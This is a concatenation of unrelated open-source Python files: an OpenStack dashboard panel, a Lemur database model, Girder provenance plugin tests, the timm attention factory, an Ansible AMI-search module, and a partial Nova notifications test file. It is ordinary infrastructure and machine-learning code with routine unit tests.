| capital-boss/plate-recognition | msp.py | Python | apache-2.0 | 1,393 |
# Copyright 2015 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.utils.translation import ugettext_lazy as _
import horizon
class AlarmsVitrage(horizon.Panel):
name = _("Alarms")
slug = "vitragealarms"
| openstack/vitrage-dashboard | vitrage_dashboard/alarms/panel.py | Python | apache-2.0 | 733 |
"""
.. module: lemur.authorizations.models
:platform: unix
:copyright: (c) 2018 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
.. moduleauthor:: Netflix Secops <[email protected]>
"""
from sqlalchemy import Column, Integer, String
from sqlalchemy_utils import JSONType
from lemur.database import db
from lemur.plugins.base import plugins
class Authorization(db.Model):
__tablename__ = "pending_dns_authorizations"
id = Column(Integer, primary_key=True, autoincrement=True)
account_number = Column(String(128))
domains = Column(JSONType)
dns_provider_type = Column(String(128))
options = Column(JSONType)
@property
def plugin(self):
return plugins.get(self.plugin_name)
def __repr__(self):
return "Authorization(id={id})".format(id=self.id)
def __init__(self, account_number, domains, dns_provider_type, options=None):
self.account_number = account_number
self.domains = domains
self.dns_provider_type = dns_provider_type
self.options = options
| Netflix/lemur | lemur/authorizations/models.py | Python | apache-2.0 | 1,090 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2013, 2014 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import json
from tests import base
from girder import events
from girder.constants import AccessType
from server import constants
def setUpModule():
base.enabledPlugins.append('provenance')
base.startServer()
def tearDownModule():
base.stopServer()
class ProvenanceTestCase(base.TestCase):
def setUp(self):
base.TestCase.setUp(self)
# Create some test documents with an item
admin = {
'email': '[email protected]',
'login': 'adminlogin',
'firstName': 'Admin',
'lastName': 'Last',
'password': 'adminpassword',
'admin': True
}
self.admin = self.model('user').createUser(**admin)
user = {
'email': '[email protected]',
'login': 'goodlogin',
'firstName': 'First',
'lastName': 'Last',
'password': 'goodpassword',
'admin': False
}
self.user = self.model('user').createUser(**user)
# Track folder, item, and setting provenance initially
self.model('setting').set(
constants.PluginSettings.PROVENANCE_RESOURCES, 'folder,setting')
coll1 = {
'name': 'Test Collection',
'description': 'test coll',
'public': True,
'creator': self.admin
}
self.coll1 = self.model('collection').createCollection(**coll1)
folder1 = {
'parent': self.coll1,
'parentType': 'collection',
'name': 'Public test folder',
'creator': self.admin
}
self.folder1 = self.model('folder').createFolder(**folder1)
self.model('folder').setUserAccess(
self.folder1, self.user, level=AccessType.WRITE, save=False)
self.model('folder').setPublic(self.folder1, True, save=True)
item1 = {
'name': 'Public object',
'creator': self.admin,
'folder': self.folder1
}
self.item1 = self.model('item').createItem(**item1)
def _checkProvenance(self, resp, item, version, user, eventType,
matches=None, fileInfo=None, resource='item'):
if resp is None:
resp = self._getProvenance(item, user, resource=resource)
self.assertStatusOk(resp)
itemProvenance = resp.json
self.assertEqual(itemProvenance['resourceId'], str(item['_id']))
provenance = itemProvenance['provenance']
self.assertEqual(provenance['eventType'], eventType)
self.assertEqual(provenance['version'], version)
self.assertEqual(str(provenance['eventUser']), str(user['_id']))
if matches:
for key in matches:
self.assertEqual(provenance[key], matches[key])
if fileInfo:
for key in fileInfo:
if isinstance(fileInfo[key], dict):
for subkey in fileInfo[key]:
self.assertEqual(provenance['file'][0][key][subkey],
fileInfo[key][subkey])
else:
self.assertEqual(provenance['file'][0][key], fileInfo[key])
def _getProvenance(self, item, user, version=None, resource='item',
checkOk=True):
params = {}
if version is not None:
params = {'version': version}
resp = self.request(
path='/%s/%s/provenance' % (resource, item['_id']),
method='GET', user=user, type='application/json', params=params)
if checkOk:
self.assertStatusOk(resp)
return resp
def _getProvenanceAfterMetadata(self, item, meta, user):
resp = self.request(path='/item/%s/metadata' % item['_id'],
method='PUT', user=user, body=json.dumps(meta),
type='application/json')
self.assertStatusOk(resp)
return self._getProvenance(item, user)
def testProvenanceItemMetadata(self):
"""
Test item provenance endpoint with metadata and basic changes
"""
item = self.item1
user = self.user
admin = self.admin
# check that the first version of the item exists
# ensure version 1, created by admin user, with creation event
self._checkProvenance(None, item, 1, admin, 'creation')
# update meta to {x:y}
metadata1 = {'x': 'y'}
resp = self._getProvenanceAfterMetadata(item, metadata1, admin)
# ensure version 2, updated by admin user, with update event, and meta
# in provenance matches
self._checkProvenance(resp, item, 2, admin, 'update',
{'new': {'meta': metadata1}})
# update meta to {} by regular user, we have to send in the key to
# remove it but check the saved metadata against {}
metadata2 = {'x': None}
resp = self._getProvenanceAfterMetadata(item, metadata2, user)
# ensure version 3, updated by regular user, with update event, and
# meta in provenance matches
self._checkProvenance(resp, item, 3, user, 'update',
{'old': {'meta': metadata1},
'new': {'meta': {}}})
# update meta to {x:y} by regular user
metadata3 = {'x': 'y'}
resp = self._getProvenanceAfterMetadata(item, metadata3, user)
# ensure version 4, updated by regular user, with update event, and
# meta in provenance matches
self._checkProvenance(resp, item, 4, user, 'update',
{'old': {'meta': {}},
'new': {'meta': metadata3}})
# update meta to {x:z} by regular user
metadata4 = {'x': 'z'}
resp = self._getProvenanceAfterMetadata(item, metadata4, user)
# ensure version 5, updated by regular user, with update event, and
# meta in provenance matches
self._checkProvenance(resp, item, 5, user, 'update',
{'old': {'meta': metadata3},
'new': {'meta': metadata4}})
# update meta to {x:z, q:u} by regular user
metadata5 = {'x': 'z', 'q': 'u'}
resp = self._getProvenanceAfterMetadata(item, metadata5, user)
# ensure version 6, updated by regular user, with update event, and
# meta in provenance matches
self._checkProvenance(resp, item, 6, user, 'update',
{'old': {'meta': metadata4},
'new': {'meta': metadata5}})
# update meta to {q:a} by regular user
metadata6 = {'x': None, 'q': 'a'}
resp = self._getProvenanceAfterMetadata(item, metadata6, user)
# ensure version 7, updated by regular user, with update event, and
# meta in provenance matches
self._checkProvenance(resp, item, 7, user, 'update',
{'old': {'meta': metadata5},
'new': {'meta': {'q': 'a'}}})
# Change the item name and description
params = {'name': 'Renamed object', 'description': 'New description'}
resp = self.request(path='/item/%s' % item['_id'], method='PUT',
user=admin, params=params)
self.assertStatusOk(resp)
params['lowerName'] = params['name'].lower()
self._checkProvenance(None, item, 8, admin, 'update', {'new': params})
# Copy the item and check that we marked it as copied
params = {'name': 'Copied object'}
resp = self.request(path='/item/%s/copy' % item['_id'],
method='POST', user=admin, params=params)
self.assertStatusOk(resp)
newItem = resp.json
self._checkProvenance(None, newItem, 9, admin, 'copy',
{'originalId': str(item['_id'])})
def testProvenanceItemFiles(self):
"""
Test item provenance when adding, modifying, and deleting files.
"""
item = self.item1
admin = self.admin
# Test adding a new file to an existing item
fileData1 = 'Hello world'
fileData2 = 'Hello world, again'
fileName1 = 'helloWorld.txt'
fileName2 = 'helloWorldEdit.txt'
resp = self.request(
path='/file', method='POST', user=admin, params={
'parentType': 'item',
'parentId': item['_id'],
'name': fileName1,
'size': len(fileData1),
'mimeType': 'text/plain'
})
self.assertStatusOk(resp)
uploadId = resp.json['_id']
fields = [('offset', 0), ('uploadId', uploadId)]
files = [('chunk', fileName1, fileData1)]
resp = self.multipartRequest(
path='/file/chunk', user=admin, fields=fields, files=files)
self.assertStatusOk(resp)
file1 = resp.json
self._checkProvenance(None, item, 2, admin, 'fileAdded',
fileInfo={'fileId': str(file1['_id']),
'new': {'mimeType': 'text/plain',
'size': len(fileData1),
'name': fileName1}})
# Edit the file name
resp = self.request(path='/file/%s' % file1['_id'], method='PUT',
user=admin, params={'name': fileName2})
self.assertStatusOk(resp)
self._checkProvenance(None, item, 3, admin, 'fileUpdate',
fileInfo={'fileId': str(file1['_id']),
'old': {'name': fileName1},
'new': {'name': fileName2}})
# Reupload the file
resp = self.request(path='/file/%s/contents' % file1['_id'],
method='PUT', user=admin,
params={'size': len(fileData2)})
self.assertStatusOk(resp)
uploadId = resp.json['_id']
fields = [('offset', 0), ('uploadId', uploadId)]
files = [('chunk', fileName1, fileData2)]
resp = self.multipartRequest(
path='/file/chunk', user=admin, fields=fields, files=files)
self.assertStatusOk(resp)
self.assertEqual(file1['_id'], resp.json['_id'])
self._checkProvenance(None, item, 4, admin, 'fileUpdate',
fileInfo={'fileId': str(file1['_id']),
'old': {'size': len(fileData1)},
'new': {'size': len(fileData2)}})
# Delete the file
resp = self.request(path='/file/%s' % file1['_id'],
method='DELETE', user=admin)
self.assertStatusOk(resp)
self._checkProvenance(None, item, 5, admin, 'fileRemoved',
fileInfo={'fileId': str(file1['_id']),
'old': {'size': len(fileData2),
'name': fileName2}})
def testProvenanceFolder(self):
"""
Test folder provenance, including turning off and on the provenance
handling of folders.
"""
folder1 = self.folder1
user = self.admin
# check that the first version of the folder provenance exists
self._checkProvenance(None, folder1, 1, user, 'creation',
resource='folder')
# Edit the folder and check again
params1 = {'name': 'Renamed folder', 'description': 'New description'}
resp = self.request(path='/folder/%s' % folder1['_id'],
method='PUT', user=user, params=params1)
self.assertStatusOk(resp)
params1['lowerName'] = params1['name'].lower()
self._checkProvenance(None, folder1, 2, user, 'update',
{'new': params1}, resource='folder')
# Turn off folder provenance and make sure asking for it fails
self.model('setting').set(
constants.PluginSettings.PROVENANCE_RESOURCES, 'setting')
resp = self._getProvenance(folder1, user, resource='folder',
checkOk=False)
self.assertStatus(resp, 400)
# While folder provenance is off, create a second folder and edit the
# first folder
params2 = {'name': 'Renamed Again', 'description': 'Description 2'}
resp = self.request(path='/folder/%s' % folder1['_id'],
method='PUT', user=user, params=params2)
self.assertStatusOk(resp)
params2['lowerName'] = params2['name'].lower()
folder2 = {
'parent': self.coll1,
'parentType': 'collection',
'name': 'Private test folder',
'creator': self.admin
}
folder2 = self.model('folder').createFolder(**folder2)
# Turn back on folder provenance and check that it didn't record the
# changes we made.
self.model('setting').set(
constants.PluginSettings.PROVENANCE_RESOURCES, 'folder,setting')
self._checkProvenance(None, folder1, 2, user, 'update',
{'new': params1}, resource='folder')
# Changing folder1 again should now show this change, and the old value
# should show the gap in the data
params3 = {'name': 'Renamed C', 'description': 'Description 3'}
resp = self.request(path='/folder/%s' % folder1['_id'],
method='PUT', user=user, params=params3)
self.assertStatusOk(resp)
params3['lowerName'] = params3['name'].lower()
self._checkProvenance(None, folder1, 3, user, 'update',
{'old': params2, 'new': params3},
resource='folder')
# The new folder should have no provenance
resp = self._getProvenance(folder2, user, resource='folder')
self.assertEqual(resp.json['resourceId'], str(folder2['_id']))
self.assertIsNone(resp.json['provenance'])
# Edit the new folder; it should show the unknown history followed by
# the edit
params4 = {'description': 'Folder 2 Description'}
resp = self.request(path='/folder/%s' % folder2['_id'],
method='PUT', user=user, params=params4)
self.assertStatusOk(resp)
resp = self._getProvenance(folder2, user, 1, resource='folder')
self._checkProvenance(resp, folder2, 1, user, 'unknownHistory',
resource='folder')
self._checkProvenance(None, folder2, 2, user, 'update',
{'new': params4}, resource='folder')
# We should also see the initial history using negative indexing
resp = self._getProvenance(folder2, user, -2, resource='folder')
self._checkProvenance(resp, folder2, 1, user, 'unknownHistory',
resource='folder')
# We should be able to get the entire history using 'all'
resp = self._getProvenance(folder2, user, 'all', resource='folder')
self.assertEqual(resp.json['resourceId'], str(folder2['_id']))
self.assertEqual(len(resp.json['provenance']), 2)
self.assertEqual(resp.json['provenance'][0]['eventType'],
'unknownHistory')
self.assertEqual(resp.json['provenance'][1]['eventType'], 'update')
# We should get an error if we ask for a nonsense version
resp = self._getProvenance(folder2, user, 'not_a_version',
resource='folder', checkOk=False)
self.assertStatus(resp, 400)
def testProvenanceSetting(self):
# After trying to set this set, only some of them should have events
self.model('setting').set(
constants.PluginSettings.PROVENANCE_RESOURCES,
'file,notification,unknown')
checkList = {
'item': True,
'file': True,
'notification': False,
'unknown': True}
for key in checkList:
eventName = 'model.%s.save' % key
self.assertTrue((eventName in events._mapping and 'provenance' in
[h['name'] for h in events._mapping[eventName]])
is checkList[key])
# Setting a blank should be okay. It should also remove all but item
# event mappings
self.model('setting').set(
constants.PluginSettings.PROVENANCE_RESOURCES, '')
for key in checkList:
eventName = 'model.%s.save' % key
self.assertTrue((eventName in events._mapping and 'provenance' in
[h['name'] for h in events._mapping[eventName]])
is (key == 'item'))
| opadron/girder | plugins/provenance/plugin_tests/provenance_test.py | Python | apache-2.0 | 17,716 |
""" Attention Factory
Hacked together by / Copyright 2021 Ross Wightman
"""
import torch
from functools import partial
from .bottleneck_attn import BottleneckAttn
from .cbam import CbamModule, LightCbamModule
from .eca import EcaModule, CecaModule
from .gather_excite import GatherExcite
from .global_context import GlobalContext
from .halo_attn import HaloAttn
from .lambda_layer import LambdaLayer
from .non_local_attn import NonLocalAttn, BatNonLocalAttn
from .selective_kernel import SelectiveKernel
from .split_attn import SplitAttn
from .squeeze_excite import SEModule, EffectiveSEModule
def get_attn(attn_type):
if isinstance(attn_type, torch.nn.Module):
return attn_type
module_cls = None
if attn_type is not None:
if isinstance(attn_type, str):
attn_type = attn_type.lower()
# Lightweight attention modules (channel and/or coarse spatial).
# Typically added to existing network architecture blocks in addition to existing convolutions.
if attn_type == 'se':
module_cls = SEModule
elif attn_type == 'ese':
module_cls = EffectiveSEModule
elif attn_type == 'eca':
module_cls = EcaModule
elif attn_type == 'ecam':
module_cls = partial(EcaModule, use_mlp=True)
elif attn_type == 'ceca':
module_cls = CecaModule
elif attn_type == 'ge':
module_cls = GatherExcite
elif attn_type == 'gc':
module_cls = GlobalContext
elif attn_type == 'gca':
module_cls = partial(GlobalContext, fuse_add=True, fuse_scale=False)
elif attn_type == 'cbam':
module_cls = CbamModule
elif attn_type == 'lcbam':
module_cls = LightCbamModule
# Attention / attention-like modules w/ significant params
# Typically replace some of the existing workhorse convs in a network architecture.
# All of these accept a stride argument and can spatially downsample the input.
elif attn_type == 'sk':
module_cls = SelectiveKernel
elif attn_type == 'splat':
module_cls = SplitAttn
# Self-attention / attention-like modules w/ significant compute and/or params
# Typically replace some of the existing workhorse convs in a network architecture.
# All of these accept a stride argument and can spatially downsample the input.
elif attn_type == 'lambda':
return LambdaLayer
elif attn_type == 'bottleneck':
return BottleneckAttn
elif attn_type == 'halo':
return HaloAttn
elif attn_type == 'nl':
module_cls = NonLocalAttn
elif attn_type == 'bat':
module_cls = BatNonLocalAttn
# Woops!
else:
assert False, "Invalid attn module (%s)" % attn_type
elif isinstance(attn_type, bool):
if attn_type:
module_cls = SEModule
else:
module_cls = attn_type
return module_cls
def create_attn(attn_type, channels, **kwargs):
module_cls = get_attn(attn_type)
if module_cls is not None:
# NOTE: it's expected the first (positional) argument of all attention layers is the # input channels
return module_cls(channels, **kwargs)
return None
| rwightman/pytorch-image-models | timm/models/layers/create_attn.py | Python | apache-2.0 | 3,526 |
#!/usr/bin/env python2
#pylint: skip-file
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_ami_find
version_added: 2.0
short_description: Searches for AMIs to obtain the AMI ID and other information
description:
- Returns list of matching AMIs with AMI ID, along with other useful information
- Can search AMIs with different owners
- Can search by matching tag(s), by AMI name and/or other criteria
- Results can be sorted and sliced
author: Tom Bamford
notes:
- This module is not backwards compatible with the previous version of the ec2_search_ami module which worked only for Ubuntu AMIs listed on cloud-images.ubuntu.com.
- See the example below for a suggestion of how to search by distro/release.
options:
region:
description:
- The AWS region to use.
required: true
aliases: [ 'aws_region', 'ec2_region' ]
owner:
description:
- Search AMIs owned by the specified owner
- Can specify an AWS account ID, or one of the special IDs 'self', 'amazon' or 'aws-marketplace'
- If not specified, all EC2 AMIs in the specified region will be searched.
- You can include wildcards in many of the search options. An asterisk (*) matches zero or more characters, and a question mark (?) matches exactly one character. You can escape special characters using a backslash (\) before the character. For example, a value of \*amazon\?\\ searches for the literal string *amazon?\.
required: false
default: null
ami_id:
description:
- An AMI ID to match.
default: null
required: false
ami_tags:
description:
- A hash/dictionary of tags to match for the AMI.
default: null
required: false
architecture:
description:
- An architecture type to match (e.g. x86_64).
default: null
required: false
hypervisor:
description:
- A hypervisor type type to match (e.g. xen).
default: null
required: false
is_public:
description:
- Whether or not the image(s) are public.
choices: ['yes', 'no']
default: null
required: false
name:
description:
- An AMI name to match.
default: null
required: false
platform:
description:
- Platform type to match.
default: null
required: false
sort:
description:
- Optional attribute which with to sort the results.
- If specifying 'tag', the 'tag_name' parameter is required.
choices: ['name', 'description', 'tag']
default: null
required: false
sort_tag:
description:
- Tag name with which to sort results.
- Required when specifying 'sort=tag'.
default: null
required: false
sort_order:
description:
- Order in which to sort results.
- Only used when the 'sort' parameter is specified.
choices: ['ascending', 'descending']
default: 'ascending'
required: false
sort_start:
description:
- Which result to start with (when sorting).
- Corresponds to Python slice notation.
default: null
required: false
sort_end:
description:
- Which result to end with (when sorting).
- Corresponds to Python slice notation.
default: null
required: false
state:
description:
- AMI state to match.
default: 'available'
required: false
virtualization_type:
description:
- Virtualization type to match (e.g. hvm).
default: null
required: false
no_result_action:
description:
- What to do when no results are found.
- "'success' reports success and returns an empty array"
- "'fail' causes the module to report failure"
choices: ['success', 'fail']
default: 'success'
required: false
requirements:
- boto
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Search for the AMI tagged "project:website"
- ec2_ami_find:
owner: self
tags:
project: website
no_result_action: fail
register: ami_find
# Search for the latest Ubuntu 14.04 AMI
- ec2_ami_find:
name: "ubuntu/images/ebs/ubuntu-trusty-14.04-amd64-server-*"
owner: 099720109477
sort: name
sort_order: descending
sort_end: 1
register: ami_find
# Launch an EC2 instance
- ec2:
image: "{{ ami_search.results[0].ami_id }}"
instance_type: m4.medium
key_name: mykey
wait: yes
'''
try:
import boto.ec2
HAS_BOTO=True
except ImportError:
HAS_BOTO=False
import json
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
region = dict(required=True,
aliases = ['aws_region', 'ec2_region']),
owner = dict(required=False, default=None),
ami_id = dict(required=False),
ami_tags = dict(required=False, type='dict',
aliases = ['search_tags', 'image_tags']),
architecture = dict(required=False),
hypervisor = dict(required=False),
is_public = dict(required=False),
name = dict(required=False),
platform = dict(required=False),
sort = dict(required=False, default=None,
choices=['name', 'description', 'tag']),
sort_tag = dict(required=False),
sort_order = dict(required=False, default='ascending',
choices=['ascending', 'descending']),
sort_start = dict(required=False),
sort_end = dict(required=False),
state = dict(required=False, default='available'),
virtualization_type = dict(required=False),
no_result_action = dict(required=False, default='success',
choices = ['success', 'fail']),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module, install via pip or your package manager')
ami_id = module.params.get('ami_id')
ami_tags = module.params.get('ami_tags')
architecture = module.params.get('architecture')
hypervisor = module.params.get('hypervisor')
is_public = module.params.get('is_public')
name = module.params.get('name')
owner = module.params.get('owner')
platform = module.params.get('platform')
sort = module.params.get('sort')
sort_tag = module.params.get('sort_tag')
sort_order = module.params.get('sort_order')
sort_start = module.params.get('sort_start')
sort_end = module.params.get('sort_end')
state = module.params.get('state')
virtualization_type = module.params.get('virtualization_type')
no_result_action = module.params.get('no_result_action')
filter = {'state': state}
if ami_id:
filter['image_id'] = ami_id
if ami_tags:
for tag in ami_tags:
filter['tag:'+tag] = ami_tags[tag]
if architecture:
filter['architecture'] = architecture
if hypervisor:
filter['hypervisor'] = hypervisor
if is_public:
filter['is_public'] = is_public
if name:
filter['name'] = name
if platform:
filter['platform'] = platform
if virtualization_type:
filter['virtualization_type'] = virtualization_type
ec2 = ec2_connect(module)
images_result = ec2.get_all_images(owners=owner, filters=filter)
if no_result_action == 'fail' and len(images_result) == 0:
module.fail_json(msg="No AMIs matched the attributes: %s" % json.dumps(filter))
results = []
for image in images_result:
data = {
'ami_id': image.id,
'architecture': image.architecture,
'description': image.description,
'is_public': image.is_public,
'name': image.name,
'owner_id': image.owner_id,
'platform': image.platform,
'root_device_name': image.root_device_name,
'root_device_type': image.root_device_type,
'state': image.state,
'tags': image.tags,
'virtualization_type': image.virtualization_type,
}
if image.kernel_id:
data['kernel_id'] = image.kernel_id
if image.ramdisk_id:
data['ramdisk_id'] = image.ramdisk_id
results.append(data)
if sort == 'tag':
if not sort_tag:
module.fail_json(msg="'sort_tag' option must be given with 'sort=tag'")
results.sort(key=lambda e: e['tags'][sort_tag], reverse=(sort_order=='descending'))
elif sort:
results.sort(key=lambda e: e[sort], reverse=(sort_order=='descending'))
try:
if sort and sort_start and sort_end:
results = results[int(sort_start):int(sort_end)]
elif sort and sort_start:
results = results[int(sort_start):]
elif sort and sort_end:
results = results[:int(sort_end)]
except TypeError:
module.fail_json(msg="Please supply numeric values for sort_start and/or sort_end")
module.exit_json(results=results)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
| attakei/openshift-ansible | playbooks/aws/openshift-cluster/library/ec2_ami_find.py | Python | apache-2.0 | 9,777 |
# Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for common notifications."""
import copy
from oslo.config import cfg
from nova.compute import flavors
from nova.compute import task_states
from nova.compute import vm_states
from nova import context
from nova import db
from nova.network import api as network_api
from nova import notifications
from nova import test
from nova.tests import fake_network
from nova.tests import fake_notifier
CONF = cfg.CONF
CONF.import_opt('compute_driver', 'nova.virt.driver')
class NotificationsTestCase(test.TestCase):
def setUp(self):
super(NotificationsTestCase, self).setUp()
self.net_info = fake_network.fake_get_instance_nw_info(self.stubs, 1,
1)
def fake_get_nw_info(cls, ctxt, instance):
self.assertTrue(ctxt.is_admin)
return self.net_info
self.stubs.Set(network_api.API, 'get_instance_nw_info',
fake_get_nw_info)
fake_network.set_stub_network_methods(self.stubs)
fake_notifier.stub_notifier(self.stubs)
self.addCleanup(fake_notifier.reset)
self.flags(compute_driver='nova.virt.fake.FakeDriver',
network_manager='nova.network.manager.FlatManager',
notify_on_state_change="vm_and_task_state",
host='testhost')
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id, self.project_id)
self.instance = self._wrapped_create()
def _wrapped_create(self, params=None):
instance_type = flavors.get_flavor_by_name('m1.tiny')
sys_meta = flavors.save_flavor_info({}, instance_type)
inst = {}
inst['image_ref'] = 1
inst['user_id'] = self.user_id
inst['project_id'] = self.project_id
inst['instance_type_id'] = instance_type['id']
inst['root_gb'] = 0
inst['ephemeral_gb'] = 0
inst['access_ip_v4'] = '1.2.3.4'
inst['access_ip_v6'] = 'feed:5eed'
inst['display_name'] = 'test_instance'
inst['hostname'] = 'test_instance_hostname'
inst['node'] = 'test_instance_node'
inst['system_metadata'] = sys_meta
if params:
inst.update(params)
return db.instance_create(self.context, inst)
def test_send_api_fault_disabled(self):
self.flags(notify_api_faults=False)
notifications.send_api_fault("http://example.com/foo", 500, None)
self.assertEqual(0, len(fake_notifier.NOTIFICATIONS))
def test_send_api_fault(self):
self.flags(notify_api_faults=True)
exception = None
try:
# Get a real exception with a call stack.
raise test.TestingException("junk")
except test.TestingException as e:
exception = e
notifications.send_api_fault("http://example.com/foo", 500, exception)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
n = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(n.priority, 'ERROR')
self.assertEqual(n.event_type, 'api.fault')
self.assertEqual(n.payload['url'], 'http://example.com/foo')
self.assertEqual(n.payload['status'], 500)
self.assertIsNotNone(n.payload['exception'])
def test_notif_disabled(self):
# test config disable of the notifications
self.flags(notify_on_state_change=None)
old = copy.copy(self.instance)
self.instance["vm_state"] = vm_states.ACTIVE
old_vm_state = old['vm_state']
new_vm_state = self.instance["vm_state"]
old_task_state = old['task_state']
new_task_state = self.instance["task_state"]
notifications.send_update_with_states(self.context, self.instance,
old_vm_state, new_vm_state, old_task_state, new_task_state,
verify_states=True)
notifications.send_update(self.context, old, self.instance)
self.assertEqual(0, len(fake_notifier.NOTIFICATIONS))
def test_task_notif(self):
# test config disable of just the task state notifications
self.flags(notify_on_state_change="vm_state")
# we should not get a notification on task stgate chagne now
old = copy.copy(self.instance)
self.instance["task_state"] = task_states.SPAWNING
old_vm_state = old['vm_state']
new_vm_state = self.instance["vm_state"]
old_task_state = old['task_state']
new_task_state = self.instance["task_state"]
notifications.send_update_with_states(self.context, self.instance,
old_vm_state, new_vm_state, old_task_state, new_task_state,
verify_states=True)
self.assertEqual(0, len(fake_notifier.NOTIFICATIONS))
# ok now enable task state notifications and re-try
self.flags(notify_on_state_change="vm_and_task_state")
notifications.send_update(self.context, old, self.instance)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
def test_send_no_notif(self):
# test notification on send no initial vm state:
old_vm_state = self.instance['vm_state']
new_vm_state = self.instance['vm_state']
old_task_state = self.instance['task_state']
new_task_state = self.instance['task_state']
notifications.send_update_with_states(self.context, self.instance,
old_vm_state, new_vm_state, old_task_state, new_task_state,
service="compute", host=None, verify_states=True)
self.assertEqual(0, len(fake_notifier.NOTIFICATIONS))
def test_send_on_vm_change(self):
# pretend we just transitioned to ACTIVE:
params = {"vm_state": vm_states.ACTIVE}
(old_ref, new_ref) = db.instance_update_and_get_original(self.context,
self.instance['uuid'], params)
notifications.send_update(self.context, old_ref, new_ref)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
def test_send_on_task_change(self):
# pretend we just transitioned to task SPAWNING:
params = {"task_state": task_states.SPAWNING}
(old_ref, new_ref) = db.instance_update_and_get_original(self.context,
self.instance['uuid'], params)
notifications.send_update(self.context, old_ref, new_ref)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
def test_no_update_with_states(self):
notifications.send_update_with_states(self.context, self.instance,
vm_states.BUILDING, vm_states.BUILDING, task_states.SPAWNING,
task_states.SPAWNING, verify_states=True)
self.assertEqual(0, len(fake_notifier.NOTIFICATIONS))
def test_vm_update_with_states(self):
notifications.send_update_with_states(self.context, self.instance,
vm_states.BUILDING, vm_states.ACTIVE, task_states.SPAWNING,
task_states.SPAWNING, verify_states=True)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
notif = fake_notifier.NOTIFICATIONS[0]
payload = notif.payload
access_ip_v4 = self.instance["access_ip_v4"]
access_ip_v6 = self.instance["access_ip_v6"]
display_name = self.instance["display_name"]
hostname = self.instance["hostname"]
node = self.instance["node"]
self.assertEqual(vm_states.BUILDING, payload["old_state"])
self.assertEqual(vm_states.ACTIVE, payload["state"])
self.assertEqual(task_states.SPAWNING, payload["old_task_state"])
self.assertEqual(task_states.SPAWNING, payload["new_task_state"])
self.assertEqual(payload["access_ip_v4"], access_ip_v4)
self.assertEqual(payload["access_ip_v6"], access_ip_v6)
self.assertEqual(payload["display_name"], display_name)
self.assertEqual(payload["hostname"], hostname)
self.assertEqual(payload["node"], node)
def test_task_update_with_states(self):
self.flags(notify_on_state_change="vm_and_task_state")
notifications.send_update_with_states(self.context, self.instance,
vm_states.BUILDING, vm_states.BUILDING, task_states.SPAWNING,
None, verify_states=True)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
notif = fake_notifier.NOTIFICATIONS[0]
payload = notif.payload
access_ip_v4 = self.instance["access_ip_v4"]
access_ip_v6 = self.instance["access_ip_v6"]
display_name = self.instance["display_name"]
hostname = self.instance["hostname"]
self.assertEqual(vm_states.BUILDING, payload["old_state"])
self.assertEqual(vm_states.BUILDING, payload["state"])
self.assertEqual(task_states.SPAWNING, payload["old_task_state"])
self.assertIsNone(payload["new_task_state"])
self.assertEqual(payload["access_ip_v4"], access_ip_v4)
self.assertEqual(payload["access_ip_v6"], access_ip_v6)
self.assertEqual(payload["display_name"], display_name)
self.assertEqual(payload["hostname"], hostname)
def test_update_no_service_name(self):
notifications.send_update_with_states(self.context, self.instance,
vm_states.BUILDING, vm_states.BUILDING, task_states.SPAWNING,
None)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
# service name should default to 'compute'
notif = fake_notifier.NOTIFICATIONS[0]
self.assertEqual('compute.testhost', notif.publisher_id)
def test_update_with_service_name(self):
notifications.send_update_with_states(self.context, self.instance,
vm_states.BUILDING, vm_states.BUILDING, task_states.SPAWNING,
None, service="testservice")
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
# service name should default to 'compute'
notif = fake_notifier.NOTIFICATIONS[0]
self.assertEqual('testservice.testhost', notif.publisher_id)
def test_update_with_host_name(self):
notifications.send_update_with_states(self.context, self.instance,
